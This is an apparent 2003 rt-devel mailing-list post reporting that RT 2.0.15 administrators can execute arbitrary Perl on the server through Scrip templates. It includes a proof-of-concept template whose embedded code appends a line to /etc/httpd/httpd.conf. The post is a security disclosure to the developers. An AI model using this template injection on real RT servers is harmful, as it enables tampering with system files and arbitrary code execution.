[rt-devel] Security Problem in 2.0.15
Warnke, Andreas
Andreas.Warnke at 3SOFT.de
Fri Feb 21 10:24:05 EST 2003
Hello,
Administrators of RT can do everything on the server the wwwrun user can
do:
Write a Scrip like:
Subject: AutoReply: {$Ticket->Subject}
Greetings,
This message has been automatically generated in response to the
creation of a trouble ticket regarding:
"{$Ticket->Subject()}",
a summary of which appears below.
Please don't reply to this message. Your ticket has been
assigned an ID of [{$rtname} #{$Ticket->id()}].
------------------------------------------------------------------------
-
{open DEBUG, ">>/etc/httpd/httpd.conf"; print DEBUG "#oh shit!"; close
DEBUG; $Transaction->Content()}
--
You can execute every perl code on the server even if you have no access
to the server. This is a bit scary - from my point of view. I hope, you
have set this straight with RT3 ?
Kind Regards
Andreas Warnke
--
Andreas Warnke
3SOFT GmbH, Frauenweiherst. 14, 91058 Erlangen
Tel.: +49-9131-7701-274 mailto:Andreas.Warnke at 3SOFT.de
Fax: +49-9131-7701-333 http://www.3SOFT.de
More information about the Rt-devel
mailing list